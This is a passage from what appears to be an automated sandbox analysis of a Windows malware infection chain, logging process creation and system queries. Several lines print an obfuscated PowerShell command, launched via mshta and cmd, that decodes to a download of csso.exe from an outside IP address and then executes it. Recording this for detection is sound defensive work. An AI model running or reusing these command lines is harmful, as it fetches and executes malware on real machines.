U5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00077CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00077CAF
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0007874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_0007874B
                    Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmp, csso.exe.3.dr, csso[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: csso.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004862B cpuid 6_2_0004862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
